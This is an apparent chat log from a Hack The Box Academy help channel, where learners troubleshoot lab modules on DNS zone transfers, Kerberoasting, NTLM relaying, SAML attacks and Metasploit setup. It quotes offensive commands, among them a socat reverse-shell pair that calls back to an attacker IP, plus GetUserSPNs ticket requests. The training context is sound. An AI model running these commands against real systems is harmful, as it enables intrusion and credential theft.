yes I guess now I will try reseting the target

wanton idol
#

yeah man sorry wish i know why

sterile epoch
#

no issue bro thanks for trying

#

if I remove the ip it works maybe because its local

#

and when restarting dns it runs without the cleanup step required

#

logging out from the account using start did the trick

pine dune
#

Hi, how can I get the fqdn of an ip address?

wanton idol
pine dune
wanton idol
#

dig any ip address

pine dune
#

ok thanks

wanton idol
#

it should have been explained on the dns module u doing rn

pine dune
#

I think it did somewhere but theres too much info 😅

wanton idol
#

yeah thats how its gonna be thats why u take notes and review back on the section to see where u can possibly find the answer even if that means re-reading the whole section again

wanton idol
#

yeah man but if u need any more help always got u

pine dune
#

thanks bro

high reef
wanton idol
pine dune
#

Hi, I used this command to try and find the TXT record in zone transfer

#

i saw there was a root.inlanefreight.htb sub domain

#

what can I do with this to access the TXT record 😅

wanton idol
#

maybe u can zone transfer with root.inlanefreight.htb

pine dune
#

I tried that

wanton idol
#

to this day i still dont really understand zone transfers and how to do them good

fathom pendant
pine dune
pine dune
fathom pendant
#

That's admin email

pine dune
#

ohh

fathom pendant
#

The records don't like @

#

So it's replaced with a .

pine dune
#

ahh

fathom pendant
#

Look up soa records

dim wolf
#

that root.inlanefreight.htb is part of the SOA record

fathom pendant
#

^

wanton idol
#

well damn

#

dns my weakspot lol

pine dune
pine dune
fathom pendant
#

Look at all the subdomains in the axfr

pine dune
#

ok hold on

wanton idol
#

if its in a A record its a sub domain right

fathom pendant
#

I'm just using subdomain loosely here

pine dune
#

ahh i saw it

wanton idol
#

returns an IPv4 address of the requested domain as a result.

pine dune
#

@fathom pendant can I post an image?

wanton idol
#

just wanted to clear this up since we on the topic of dns zone transfer. if u see the subdomains once u zone transfered like how he is doing dig axfr inlanefreight.htb @10.129.176.215 and u want to zone transfer like internal.inlanefreigth.htb u need to add it to the /etc/hosts?

pine dune
#

I added it to etc hosts

fathom pendant
#

You don't need to add anything to /etc/hosts for this

wanton idol
fathom pendant
pine dune
#

there are 3 TXT under SOA

fathom pendant
pine dune
fathom pendant
#

dig axfr subdomain @target_ip

pine dune
#

ok thx ill try that

fathom pendant
pine dune
wanton idol
#

im just reviewing everything before i take the aen blindly lol

fathom pendant
#

An fqdn is comprised of multiple parts. Sub.domain.tld

#

(Tld is like .com, .net, .htb)

wanton idol
#

sub can also be www just in case

pine dune
#

having this problem

wanton idol
#

yeah thats what i was talking about

pine dune
#

how do i fix it?

wanton idol
#

that was my problem and hated it

pine dune
#

ahh

#

did u manage to fix it?

wanton idol
#

yeah but that was a longgg time ago thats why i was asking again to see what i did to fix it

#

adding it to /etc/hosts wont fix it so that wont work

pine dune
#

ahh

wanton idol
#

i think u need to use the ns record

wanton idol
pine dune
wanton idol
#

replace the @ip with the @ns.inlanefreight.htb

pine dune
#

wdym?

#

ahh ok

wanton idol
#

and do zone transfer that way

#

see if that works

pine dune
#

so instead of ip addess I have the domain name and the @ns.inlane...?

wanton idol
#

yeah see if that works for zone transfer

pine dune
#

didnt work 😅

wanton idol
#

welp dns is my weakness i swear LOL

#

ima review that module again rn

pine dune
#

its okay lol..ill wait for marcie or someone else to reply

#

thanks tho bro

wanton idol
#

ima get it watch

#

in a few min ima get it down

pine dune
#

🙌

wanton idol
#

@pine dune im so dumb

#

ok so basically u cant always zone transfer

#

like the dev.inlanefreight.htb u cant zone transfer

#

and the @ns.inlanefreight.htb no need to do that just keep the target ip

#

plus u would need to add the ns.inlanefreight.htb to /etc/hosts so no point

pine dune
wanton idol
#

ik but im saying keep it with the target ip

#

and zone transfer a diff sub domain u found

#

like internal.inlanefreight.htb

pine dune
wanton idol
#

so dig axfr internal.inlanefreight.htb @ip

#

yeah im saying that it wont let u zone transfer at all

pine dune
#

for that specific sub domain ? ^

wanton idol
#

yup

pine dune
#

ahh

#

let me try another

wanton idol
#

so try a diff one and see if it will let u

pine dune
#

ok cool

pine dune
wanton idol
#

yupp anytime

pine dune
#

What is the FQDN of the host where the last octet ends with "x.x.x.203"?

#

last question...ive tried enumerating all the subdomains from the command u told me @wanton idol but none of them seem to work

pseudo birch
#

I'm having issues with socat instantly dropping the reverse shell connection. It will call back to the listener and then drop. I'm using socat TCP-L:<PORT> FILE:``tty``,raw,echo=0 as the listener and socat TCP:<ATTACK-IP>:<PORT> EXEC:“bash -li”,pty,stderr,sigint,sane. I'm not using setsid because it breaks my command. I used the -h and checked others commands. However, they all seem a little different where they place "bash" and "EXEC" does that matter?

wanton idol
#

i suggest with dnsenum

pine dune
wanton idol
#

dnsenum --dnsserver 10.129.14.128 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt inlanefreight.htb

pine dune
#

thanks

wanton idol
#

yupp and for the inlanefreight.htb make sure u change it to like all of the sub domains u have found and try it on dev.inlanefreight.htb since itll brute force it will find some stuff for us

pine dune
#

this is what i got 😅

#

@wanton idol

limber river
#

why there's ~

#

at the end ?

wanton idol
#

^

pine dune
#

oh shit my bad

wanton idol
#

lol

limber river
#

can anyone here confirm that the target are spawning normally ?

wanton idol
pine dune
limber river
#

was working fine , now I can't spawn

wanton idol
#

try switching to a diff vpn

limber river
#

the VPN is fine , seems like frontend error

inner geyser
#

So I'm on 'Kerberoasting - from Linux' in the 'Active Directory Enumeration & Attacks' module...continuing to get "[Errno 104] Connection reset by peer"

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request

Having no issues Listing SPN Accounts, but adding in the -request above doesn't render one TGS Ticket due to the connection reset by peer error. Any suggestions, as that is the exact command listed in the solution? I've reset the Target server once already

pine dune
#

still got this 😅

inner geyser
#

Impacket-GetUserSPNs -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request

#

is the command being run

limber river
inner geyser
#

i've done that as well

#

same connection reset by peer error

wanton idol
#

have u tried python3 then the rest of the command?

wanton idol
pine dune
wanton idol
#

no worries tho

#

some reason that wont work then use this

limber river
wanton idol
#

everything im telling u is from the module

#

for sub in $(cat /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.inlanefreight.htb @10.129.14.128 | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done

leaden star
inner geyser
limber river
inner geyser
leaden star
wanton idol
#

thats why then

limber river
wanton idol
#

LOL refresh your page and see if your target has expired

limber river
leaden star
wanton idol
#

fs fs

pine dune
#

terminal seems to have crashed

limber river
pine dune
inner geyser
#

probably just going to hang it up on this module tonight and try it again later

#

Thanks for the offers to help

woven stone
#

How can I solve this problem? The VPN was working for me an hour ago, but it did not work

spark spruce
shut quest
woven stone
cloud urchin
woven stone
cloud urchin
#

i made a pdf so i don't have to type it 80 times a day

woven stone
#

But this is not my problem

#

my prob in vpn

cloud urchin
#

the guide covers that at step 5

woven stone
fathom pendant
# pine dune

well ns.inlanefreight.htb isn't in your /etc/hosts

#

try with the actual IP of the host

silk dagger
acoustic owl
#

How can someone help you if they don't know exactly what you're working on?
The Academy now has 102 modules. Each module has several sections.

#

Without precise information about which module in which section and which question you are currently working on, it is impossible to offer you help

snow ridge
#

Am I understanding something wrong? In the new module "DACL Attacks II" and section Logon Scripts module tells to RDP with julios credentials, but I just get wrong username/password. There is no spawn machine button in that section so I expect that we should use the machine from previous section Shadow Credentials. So basically I'm stuck now because credentials are not working.

#

This is from section Logon Scripts questions.

#

Bloodhound tells that there is no user called "julio" in the lab spawned from previous section.

eager ledge
#

Hi, I am doing the first exercise of Attacking SQL Databases section of "ATTACKING COMMON SERVICES" module. I have got the NTLMv2-SSP Hash of the mssqlsvc user. But when I try to crack the hash using hashcat mode 5600, it doesn't do anything. Now, I am trying to use impacket-ntlmrelayx to execute commands on the target server itself. I get the connection to the SMB server on my attackbox, but then the error pops up and the command doesn't get executed:

[*] SMBD-Thread-5: Received connection from 10.129.25.56, attacking target smb://10.129.25.56
[-] SMBClient error: Connection was reset
Traceback (most recent call last):
  File "/usr/local/lib/python3.9/dist-packages/impacket/smbserver.py", line 4441, in processRequest
    respCommands, respPackets, errorCode = self.__smb2Commands[smb2.SMB2_NEGOTIATE](
  File "/usr/local/lib/python3.9/dist-packages/impacket/examples/ntlmrelayx/servers/smbrelayserver.py", line 158, in SmbNegotiate
    connData['EncryptionKey'] = client.getStandardSecurityChallenge()
  File "/usr/local/lib/python3.9/dist-packages/impacket/examples/ntlmrelayx/clients/smbrelayclient.py", line 603, in getStandardSecurityChallenge
    if self.session.getDialect() == SMB_DIALECT:
  File "/usr/local/lib/python3.9/dist-packages/impacket/smbconnection.py", line 206, in getDialect
    return self._SMBConnection.getDialect()
AttributeError: 'int' object has no attribute 'getDialect'

For simplicity, I am just executing whoami command using the -c flag. But cannot get the output. What am I doing wrong?

fluid quartz
#

Hi - Im working through Introduction to Windows Evasion Techniques. im having issue with the crypter in the static section, specifically wondering what data i enter into cyberchef? (do i include the starting variables, or just the shellcode separated by commas?) please @ and/or DM me if you can help!!!

#

im not able to get the flag to generate, figure its the Loader code, probably the aes stuff not properly decoding

eager ledge
silk dagger
# acoustic owl

instead of flaming around you just could have jumped back. I wrote a detailed question... 😕

Hi everyone... i'm stuck in
"Signatur Exclusion Attack"

Every time when I change the value of htb-stdnt to:
<saml:AttributeValue xsi:type="xs:string">admin</saml:AttributeValue>

I'm getting this error:
<b>Warning</b>: DOMDocument::loadXML(): Start tag expected, '<' not found in Entity, line: 1 in <b>/var/www/sp/vendor/onelogin/php-saml/src/Saml2/Utils.php</b> on line <b>87</b><br />
Something went wrong.

Even by just changing one single attribute value. How could a '<' vanish in the process? Any ideas?

acoustic owl
silk dagger
#

OK, sorry for that...
it's
#module Attacking Authentication Mechanisms
Signature Exclusion Attack

acoustic owl
#

I just wrote down that I did the Attakce exactly as described in the module. However, the module has been changed in the meantime. The section was then called "No Signature Verification"

I only changed the mail address and encoded it again with base64

molten ember
#

Can someone help with medium lab on module "network enumeration with nmap"? I try to get dns-nsid of dns server but script is giving me "dns.query() failed to resolve the requested query: version.bind"

kind turret
upper haven
kind turret
#

@snow ridge The section now contains the VM you should spawn.

tawdry shuttle
#

Do I still need proxychains if I am using ligolo?

strange trout
#

Can i know what msf options you used to exploit? I am unable to get any results from msfconsole

dark garden
#

Hello, I am working on the hard skills assessment of the footprinting module, and I am stuck for days. I have the feeling that I tried everything possible, and I have no idea where to look for now. I do not want the answer, but I would be interested by a little nudge to help me continue this assessment. Could someone give me a little hint? Thanks.

cedar void
next ledge
#

Module: ATTACKING COMMON APPLICATIONS
Chapter: Exploiting Web Vulnerabilities in Thick-Client Applications
Question: What is the IP address of the eth0 interface under the ServerStatus -> Ipconfig tab in the fatty-client application?
Issue: After rebuilding and running the fatty-client-new.jar when I attempt to login the fatty-client-new.jar program freezes. It freezes with the provided credentials and fake creds. I have tried building the new file from a normal and admin powershell. Packet captures show the client and server initiating a conneciton but then nothing else happens. I also rebuilt the lab three times.

please @me if you can help.

fringe urchin
dry halo
#

is the eu vpn dead

#

tried eu 1 and eu 2 both tcp and udp

zealous fiber
#

Hello could anyone help me with the Skill Assesment on Into to Whitebox Pentesting ?. Pm me 🙂

open summit
dry halo
fierce mason
#

for the ad attacks module, do i need to install dotnet on the target host

limber river
dry halo
open summit
#

why doesnt it create a session

fringe urchin
#

Set it to your tun0

open summit
#

why is it using that and not my vpn ip

shut quest
#

msfc isn't listening on the correct interface

open summit
#

how do i make it use my tun0

fringe urchin
#

You either type set LHOST tun0

#

Or
SET LHOST 10.10.14.120

open summit
#

ok thank u

fringe urchin
shut quest
#

I forgot where it is off the top of my head but there is a msf config so you can set lhost to always be tun0

cedar void
fathom pendant
fathom pendant
worn matrix
#

Does anyone have a link or something,for attacking sql prepared statements?i can't exploit the CALL function(input);

fathom pendant
#

I clicked it like 20 times

fringe urchin
open summit
#

now that im in the target shell how do i find a file called flag.txt

#

cuz ls doesnt work on windows

limber river
open summit
open summit
#

like it does in linux

limber river
open summit
#

its fine i just did type C:/user...

next bronze
limber river
fathom pendant
#

Right now the current directory is system32

fathom pendant
limber river
fathom pendant
#

Is it?

limber river
fathom pendant
#

Huh

cedar void
# fathom pendant You gotta click it a bunch

how many times did you click it before you generated a result? I clicked it more than 12 times. I caught the intercept, then send it to a response body text and after I altered the web content I then forwarded the altered web content. I did not use the repeater

fathom pendant
#

I didn't do any intercept

#

I just clicked until it worked

winged egret
#

hello guys does the skill assesment-part-1 in Active Directory enumeration rely on responder capturing a service account hash or is it just getting a list of username and password spraying ? can someone point me in the right direction

fathom pendant
#

Password spraying involves using 1 password

#

Think of basic passwords that would adhere to basic Complexity rules

winged egret
#

yes but should I get something back from responder ?

fathom pendant
#

Responder won't find anything until it's talked to, and that can take a min

neat horizon
#

hey everyone! I'm having an issue with an exercise from the "Pass the Ticket (PtT) from Linux" session from the Password Attacks module. I'm with root access in the LINUX01 machine, and I'm importing the tickets available in the /tmp folder. However, when I try to run smbclient //dc01/julio -k -c ls -no-pass, I get an error using all the available ccache files. Can someone help? I have tried respawning the machine at least 4 times, and also changed the VPN region.

fathom pendant
#

If you feel it's taking too long try other methods

worn matrix
#

any tip,how to bypass prepared statements?i try to do the challenge stored procedure in OWASP SHEPHERD but i really can't

calm abyss
#

@dim wolf can i talk to you in private ?

spark spruce
#

I have $42 in my HTB academy balance account and I want to get a subscription of platinum which is $68.
when I start subscribing, my billing shows that I have to pay $68 from my credit card
But I want to use my $42 balance and remaining $26 from my credit card.
How can I do this?

spark spruce
worn matrix
fathom pendant
pseudo birch
#

I'm doing Attacking Enterprise Network: Exploitation & Privilege Escalation. I've reset the target and Pwnbox multiple times, but whenever I get the ssh connection to the first box as root it is instantly dropping connection. "Channel 4: open failed: connect failed: Connection timed out." Proxychains.conf has been edited. I've tried different ports socks4 and socks5. Is there an explanation for this drop of connection when using SSH port forwarding? I wasn't having this issue last night, but I am this morning.

calm abyss
blissful plume
#

Back!

neat horizon
cloud urchin
#

renew it?

inner geyser
#

So I'm on 'Kerberoasting - from Linux' in the 'Active Directory Enumeration & Attacks' module...continuing to get "[Errno 104] Connection reset by peer"

Impacket-GetUserSPNs -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request

Having no issues Listing SPN Accounts, but adding in the -request above doesn't render one TGS Ticket due to the connection reset by peer error. Any suggestions, as that is the exact command listed in the solution?

Principal: INLANEFREIGHT.LOCAL\SAPService - [Errno 104] Connection reset by peer

neat horizon
# cloud urchin renew it?

I don't know if that is possible, considering that those are ccache files that I understand are created when the actual user logs in. Since I am not the actual user (julio) and don't have their password, I don't see a way of renewing the ccache files

next bronze
#

there should be tickets that are not expired somewhere

inner geyser
next bronze
#

eu2 works

neat horizon
inner geyser